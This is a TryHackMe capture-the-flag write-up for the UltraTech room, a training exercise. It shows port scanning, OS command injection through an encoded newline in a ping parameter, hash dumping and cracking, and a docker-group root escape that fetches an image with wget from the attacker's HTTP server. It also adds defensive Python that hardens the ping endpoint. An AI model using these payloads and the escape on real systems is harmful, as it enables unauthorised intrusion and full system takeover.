This is a write-up for TryHackMe's room named UltraTech: https://tryhackme.com/room/ultratech1
Room details: the basics of Penetration Testing, Enumeration, Privilege Escalation and WebApp testing. According to the author, this room was based on a real-world scenario, which makes it more interesting and useful.
Deploy the machine and scan for all the open ports:
sudo nmap -sS -Pn -T4 -p- 10.10.75.119
This quickly gives us all the open ports; now let's enumerate further using only these ports:
sudo nmap -O -A -Pn -T4 -p21,22,8081,31331 10.10.75.119
This should give us the first four answers for [Task 2]. For Question 5, run dirb like:
and that will reveal robots.txt:
and then utech_sitemap.txt and we will get the answer.
Navigate to all the web pages we found above and use Burp Suite to see how they interact with the web server. Start with http://10.10.75.119:31331/partners.html, which gives us some kind of login page:
In Burp Suite we can see a request going to the web server every 10 seconds, which looks to be a ping command:
Open this GET request in the browser using http://10.10.75.119:8081/ping?ip=10.10.75.119 and we can verify the same.
This looks to be a good candidate for OS command injection, and after trying a few options we are able to execute OS commands using http://10.10.75.119:8081/ping?ip=10.10.75.119%0Als :
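As an added defender's-side example (not part of the original write-up or of the UltraTech application), this shows how a ping endpoint like the one at /ping?ip= can be hardened so that the encoded-newline trick above is rejected: validate the parameter as a literal IPv4 address and run ping with an argv list rather than a shell string. The function names and sample values are mine.

```python
import ipaddress
import subprocess


def is_valid_ipv4(value: str) -> bool:
    """Return True only for a literal IPv4 address.

    The raw query value is validated as-is (no .strip()): a trailing
    newline or ';' is exactly what the %0A injection relies on, so
    anything that is not a bare dotted-quad is rejected.
    """
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:  # AddressValueError is a ValueError subclass
        return False


def build_ping_command(ip: str) -> list:
    """Build ping's argv for a validated address.

    Passing a list to subprocess.run() without shell=True means the
    user-supplied value reaches ping as one argument and is never
    parsed by /bin/sh, which is the root cause of the injection.
    """
    if not is_valid_ipv4(ip):
        raise ValueError(f"rejected ping target: {ip!r}")
    return ["ping", "-c", "1", ip]


def run_ping(ip: str) -> str:
    """Execute the hardened ping with a bounded runtime and return stdout."""
    proc = subprocess.run(build_ping_command(ip), capture_output=True,
                          text=True, timeout=10)
    return proc.stdout


# Constructed sample query values: the legitimate one seen in Burp and
# injected variants (the first decodes from ?ip=10.10.75.119%0Als).
SAMPLE_INPUTS = {
    "10.10.75.119": True,
    "10.10.75.119\nls": False,
    "10.10.75.119;id": False,
    "localhost": False,
    "": False,
}

if __name__ == "__main__":
    for value, expected in SAMPLE_INPUTS.items():
        print(f"{value!r:22} valid={is_valid_ipv4(value)} expected={expected}")
```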
We are also able to find the database file that was asked about in the question in [Task 3]. Let's now look at the content of that database file using the cat command:
We are able to dump the hashes for the user named r00t and one other user. Both hashes can easily be cracked using:
We should now be able to answer the rest of the questions for [Task 3].
Using these credentials we are able to log in via SSH as the user "r00t".
"r00t" is a low-privilege user but a member of the docker group.
Now [Task 4] is all about privilege escalation, and usually I run a few of the well-known scripts for Linux privilege escalation; in this case I ran LinPEAS.sh:
Right at the start, the script indicated a 99% PE vector via the docker group:
After searching I found the following useful resources which do privilege escalation via the docker group:
The problem was that this method was trying to pull the docker images via the internet, but our target machine was not connected to the internet. After looking around I found this Stack Overflow post, which helped in first getting the image locally onto the attacking machine and then onto the target machine from the attacking machine before running the exploit:
I used this resource to install docker on Kali:
Ran the following commands on the attacking machine:
sudo docker pull chrisfosterelli/rootplease
sudo docker save --output rootplease.tar chrisfosterelli/rootplease
sudo chmod 755 rootplease.tar
python3 -m http.server
and the following commands on the target machine:
wget http://10.9.6.174:8000/rootplease.tar
docker load --input rootplease.tar
docker run -v /:/hostOS -it --rm chrisfosterelli/rootplease
Running the last command above resulted in a root shell :)
To get the final answer, run the following and read the private SSH key for root: